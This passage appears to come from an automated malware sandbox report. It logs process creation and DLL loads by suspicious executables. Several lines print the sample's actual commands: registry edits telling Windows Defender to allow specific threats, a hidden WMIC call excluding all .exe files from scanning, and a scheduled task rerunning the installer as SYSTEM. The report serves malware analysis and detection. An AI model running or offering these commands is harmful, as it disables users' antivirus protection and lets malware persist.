Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe "C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe "C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Process created: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe .\Install.exe /odidum "385118" /S
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8028 -ip 8028
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8028 -s 356
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Section loaded: icu.dll	Jump to behavior
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: authz.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: devrtl.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: iertutil.dll	Jump to behavior
